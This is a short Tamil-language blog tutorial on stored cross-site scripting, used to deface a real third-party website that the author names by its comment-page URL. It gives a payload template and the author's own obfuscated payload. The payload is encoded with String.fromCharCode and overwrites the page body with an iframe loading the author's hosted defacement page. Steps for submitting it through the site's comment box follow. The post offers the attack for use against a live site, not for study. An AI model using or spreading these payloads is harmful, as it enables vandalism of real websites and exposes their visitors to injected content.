Stored XSS என்றால் என்ன?

 நாம் ஏற்கனவே Non persistent  [Reflected XSS] பார்த்திருந்தோம்.
இன்று Persistent[Stored XSS] –ஐ பார்ப்போம்.
இந்த Method மூலம்  நமது victim Site-ல்  malicious Script-ஐ Strore செய்து வைத்து  நமக்கு தேவையான DEFECE-கூட செய்யமுடியும்.


malicious Script-ஐ victim Site-ல்   உள்ள command,submission forms,contact forms,post,upload. ஆகிய இடங்களில் Inject செய்யலாம்.



இன்று நாம் DEFECE செய்ய போகிறோம்.
Target site: http://www.zelda-renaissance.fr/comment.php?id=40
இந்த site-ல்  command box உள்ளது  இதில் நம்முடைய எ ந்த code-ஐ வேண்டுமானலும் Execute செய்யலாம்.  பழைய பதிவில் கூறியுள்ளேன்  XSS malicious Script-ஐ Command-ல் கொடுத்து captcha-ஐ fill செய்து முடித்தவுடன் அந்த Link-ஐ open செய்தால் உங்கள் code execute ஆகும். [அதாவது உங்கள் பொருத்து normal Reflected etc]



இப்பொது நான் அதேபோல் defece செய்ய முடியும்.

 நான் என்னுடைய defece page-ஐ host செய்து வைத்துள்ளேன். my defece http://tamilzombie.net23.net/

இப்போது இந்த  script –ஐ வைத்து DEFECE செய்யலாம்
<script>
var iframe=your defece page host
document.body.innerHTML=iframe;
</script> 
இதில் உங்கள் defece webpage address-ஐ String.fromCharCode ஆக covert செய்து கொள்ளவேண்டும்.
இது என்னுடைய Script


<script>
var iframe=String.fromCharCode(60, 105, 102, 114, 97, 109, 101, 32, 115, 114, 99, 61, 104, 116, 116, 112, 58, 47, 47, 116, 97, 109, 105, 108, 122, 111, 109, 98, 105, 101, 46, 110, 101, 116, 50, 51, 46, 110, 101, 116, 47, 32, 115, 116, 121, 108, 101, 61, 112, 111, 115, 116, 105, 111, 110, 58, 102, 105, 120, 101, 100, 59, 116, 111, 112, 58, 48, 59, 108, 101, 102, 116, 58, 48, 59, 104, 101, 105, 103, 104, 116, 58, 49, 48, 48, 37, 59, 119, 105, 100, 116, 104, 58, 49, 48, 48, 37, 59, 62)
document.body.innerHTML=iframe;
</script>இப்பொது Commandbox-ல் Script-ஐ கொடுத்து விட்டு captcha-ஐ fill செய்து முடித்தவுடன் அந்த Link-ஐ refersh  செய்தால் உங்கள் code execute ஆகும்.


 Watch video




No comments